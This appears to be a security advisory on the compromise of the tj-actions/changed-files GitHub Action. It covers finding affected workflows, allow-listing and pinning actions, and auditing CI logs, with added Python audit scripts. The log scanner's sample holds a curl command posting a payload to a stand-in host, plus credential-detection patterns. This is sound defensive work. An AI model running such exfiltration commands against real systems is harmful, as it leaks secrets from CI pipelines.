Popular GitHub Action tj-actions/changed-files has been compromised (GitHub issue) with a payload that appears to attempt to dump secrets, impacting thousands of CI pipelines. This isn’t the first security issue with tj-actions/changed-files—see prior vulnerability CVE-2023-51664.
What you should do
Find out where you're affected
The simplest way to find this is to grep for tj-actions in your codebase. If you're on GitHub, look at the results of this query, replacing YOURORG with your organization's name on GitHub:
https://github.com/search?q=org%3A<YOURORG>+uses%3A+tj-actions%2F&type=code
Arguably, Semgrep is overkill for this case. But Lewis Ardern on our team wrote a Semgrep rule to find usages of tj-actions, which you can run locally (without sending code to the cloud) via:
semgrep --config r/10Uz5qo/semgrep.tj-actions-compromised
And if we find more information about what tags & commits are affected, we can update the rule over time to become more precise about whether or not you could be impacted. At time of writing, it looks like all versions are compromised.
For users of Semgrep AppSec Platform, we recommend placing the detection rule in blocking mode immediately: visit the rule, click “add to policy”, and select “blocking mode.”
Stop using tj-actions/changed-files immediately. Switch to a safer alternative or inline your file-change detection logic. Just removing it from the main branch of your repository won't be enough; it could still run on other branches depending on how your actions are configured. So you need to remove it from all branches to be safe.
As an alternative, GitHub has a feature that lets you allow-list GitHub Actions, so you can ensure the compromised action won't run even if a reference to it is still in your code.
You’ll need a list of GitHub Actions used at your org. Run this query on your codebase:
$ semgrep -e 'uses: $ACTION' -l yaml --json .github | jq -r '.results[].extra.metavars["$ACTION"].abstract_content' | grep -vE '^(actions/|docker://|[.]/[.]github/|tj-actions/)' | awk -F'@' '{print $1 "@*,"}' | sort | uniq
DataDog/synthetics-ci-github-action@*,
actions-rs/toolchain@*,
astral-sh/setup-uv@*,
aws-actions/amazon-ecr-login@*,
Remove tj-actions/changed-files from the list of GitHub Actions.
Go to the GitHub Actions settings for your repository (or organization) and paste the list into the allow-list there. For our semgrep-app repository, that page is:
https://github.com/semgrep/semgrep-app/settings/actions
Generally, pin all GitHub Actions to specific commit SHAs (rather than version tags) you know are safe. In this case, it appears that all versions are compromised.
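As an added example (it is not code from the original post or from Semgrep), the following Python script does the find-where-you're-affected step and the allow-list inventory above without Semgrep or jq, and goes one step further by flagging every action that is not pinned to a full 40-character commit SHA. It parses the uses: lines of workflow files with a regular expression (so it needs no YAML library), reports any reference to tj-actions/, and emits allow-list entries in the same owner/repo@*, form the pipeline above produces, skipping the same prefixes that pipeline filters out. The embedded workflow is constructed sample input; run the script against a real checkout with `python audit_actions.py /path/to/repo`.

```python
import re
from pathlib import Path
from typing import Dict, List, NamedTuple

# Constructed sample workflow standing in for a file under .github/workflows/.
SAMPLE_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
      - uses: tj-actions/changed-files@v45
        id: changed
      - uses: ./.github/actions/local-helper
      - uses: docker://alpine:3.19
      - uses: aws-actions/amazon-ecr-login@v2
"""

# Matches 'uses:' at step level or job level (reusable workflows), with or without quotes.
USES_RE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^'"\s#]+)""")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")
# Same prefixes the allow-list pipeline on the page filters out with grep -vE.
ALLOWLIST_SKIP = ("actions/", "docker://", "./.github/")
# Local actions and container images have no commit to pin to.
PIN_EXEMPT = ("./", "docker://")
COMPROMISED_OWNER = "tj-actions/"


class ActionRef(NamedTuple):
    line: int
    action: str  # owner/repo[/path]
    ref: str     # tag, branch or SHA after '@' ('' if absent)


def parse_uses(text: str) -> List[ActionRef]:
    """Return every action reference in one workflow file, with its line number."""
    refs = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = USES_RE.match(line)
        if m:
            action, _, ref = m.group(1).partition("@")
            refs.append(ActionRef(lineno, action, ref))
    return refs


def audit(text: str) -> Dict[str, List]:
    """Flag compromised and unpinned references; build allow-list entries."""
    refs = parse_uses(text)
    compromised = [r for r in refs if r.action.startswith(COMPROMISED_OWNER)]
    unpinned = [r for r in refs
                if not r.action.startswith(PIN_EXEMPT) and not FULL_SHA_RE.match(r.ref)]
    allowlist = sorted({f"{r.action}@*," for r in refs
                        if not r.action.startswith(ALLOWLIST_SKIP)
                        and not r.action.startswith(COMPROMISED_OWNER)})
    return {"compromised": compromised, "unpinned": unpinned, "allowlist": allowlist}


def scan_workflows(root: str = ".") -> Dict[str, List]:
    """Audit every workflow under <root>/.github/workflows (entry point for a real repo)."""
    combined = {"compromised": [], "unpinned": [], "allowlist": set()}
    for path in sorted(Path(root, ".github", "workflows").glob("*.y*ml")):
        result = audit(path.read_text(encoding="utf-8"))
        combined["compromised"] += [(str(path), r) for r in result["compromised"]]
        combined["unpinned"] += [(str(path), r) for r in result["unpinned"]]
        combined["allowlist"].update(result["allowlist"])
    combined["allowlist"] = sorted(combined["allowlist"])
    return combined


if __name__ == "__main__":
    import sys
    report = scan_workflows(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path, r in report["compromised"]:
        print(f"COMPROMISED {path}:{r.line} {r.action}@{r.ref}")
    for path, r in report["unpinned"]:
        print(f"UNPINNED    {path}:{r.line} {r.action}@{r.ref or '(none)'}")
    print("allow-list:", " ".join(report["allowlist"]))
```

On the constructed sample, audit() reports the tj-actions/changed-files step on line 8 as compromised, lists both tag-pinned references (changed-files@v45 and amazon-ecr-login@v2) as unpinned, and produces a single allow-list entry, aws-actions/amazon-ecr-login@*, because actions/, docker:// and local paths are excluded just as in the pipeline above. Run it on every branch, not only main, for the reason given above.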
Audit past workflow runs for signs of compromise. Check logs for suspicious outbound network requests. Prioritize repos where your CI runner logs are public, as secrets are dumped to stdout in the payload.
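As an added example of the log-audit step (not code from the original post), the Python scanner below walks runner log lines and reports two things a practitioner would look for: well-known credential formats appearing in plain text, which is what a secret dump to stdout leaves behind, and curl or wget invocations to hosts outside an expected set. The page does not describe the payload's exact output format, so the credential patterns are generic (GitHub token prefixes, AWS access key IDs, PEM private-key headers); the log lines, the EXPECTED_HOSTS set and the AKIAIOSFODNN7EXAMPLE key are constructed or documentation values, and the host set is an assumption to tune for your own runners.

```python
import re
from typing import List, NamedTuple
from urllib.parse import urlparse

# Constructed runner log excerpt; example.invalid is a reserved, non-routable name.
SAMPLE_LOG = """\
2025-03-14T21:02:11.4415Z Run tj-actions/changed-files@v45
2025-03-14T21:02:12.0180Z ##[group]Run git fetch --depth=1 origin main
2025-03-14T21:02:13.2210Z AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
2025-03-14T21:02:13.2215Z GITHUB_TOKEN=ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
2025-03-14T21:02:13.3000Z curl -s https://example.invalid/collect -d @payload
2025-03-14T21:02:13.5000Z -----BEGIN OPENSSH PRIVATE KEY-----
2025-03-14T21:02:14.0000Z Done.
"""

# Hosts a GitHub-hosted workflow is normally expected to reach (assumption; tune per org).
EXPECTED_HOSTS = {"github.com", "api.github.com", "objects.githubusercontent.com"}

# Generic credential shapes; the actual dump format is not documented on the page.
CREDENTIAL_PATTERNS = {
    "github_token": re.compile(r"\b(gh[pousr]_[A-Za-z0-9]{36})\b"),
    "github_pat": re.compile(r"\b(github_pat_[A-Za-z0-9_]{22,})\b"),
    "aws_access_key": re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b"),
    "private_key": re.compile(r"(-----BEGIN [A-Z ]*PRIVATE KEY-----)"),
}
OUTBOUND_RE = re.compile(r"""\b(?:curl|wget)\b.*?(https?://[^\s'"]+)""")
COMPROMISED_ACTION = "tj-actions/changed-files"


class Finding(NamedTuple):
    line: int
    kind: str
    detail: str  # redacted credential or the contacted host


def redact(value: str, keep: int = 4) -> str:
    """Keep a short prefix so a hit can be matched to a known secret without re-exposing it."""
    return value[:keep] + "*" * max(len(value) - keep, 0)


def ran_compromised_action(text: str) -> bool:
    """True if the log shows the compromised action executing at all (prioritise these runs)."""
    return COMPROMISED_ACTION in text


def audit_log(text: str) -> List[Finding]:
    """Return credential-shaped strings and unexpected outbound requests, in line order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in CREDENTIAL_PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append(Finding(lineno, kind, redact(m.group(1))))
        m = OUTBOUND_RE.search(line)
        if m:
            host = urlparse(m.group(1)).hostname or ""
            if host not in EXPECTED_HOSTS:
                findings.append(Finding(lineno, "outbound_request", host))
    return findings


if __name__ == "__main__":
    import sys
    log = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_LOG
    print("ran compromised action:", ran_compromised_action(log))
    for f in audit_log(log):
        print(f"line {f.line}: {f.kind} {f.detail}")
```

Findings carry only a redacted prefix, so the audit output itself does not become another place the secret is written down. A credential hit in a log that is public should be treated as exposed and rotated regardless of what else the payload did; a hit in a private log still needs to be cross-checked against the outbound_request findings to judge whether it left the runner.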
Affected versions
At time of writing (2025-03-14T23:55:00Z), we assessed by inspecting tag pointers in the source repo that all versions of tj-actions/changed-files are compromised. Users may verify with git tag --points-at 0e58ed8. See commit 0e58ed8 in https://github.com/tj-actions/changed-files.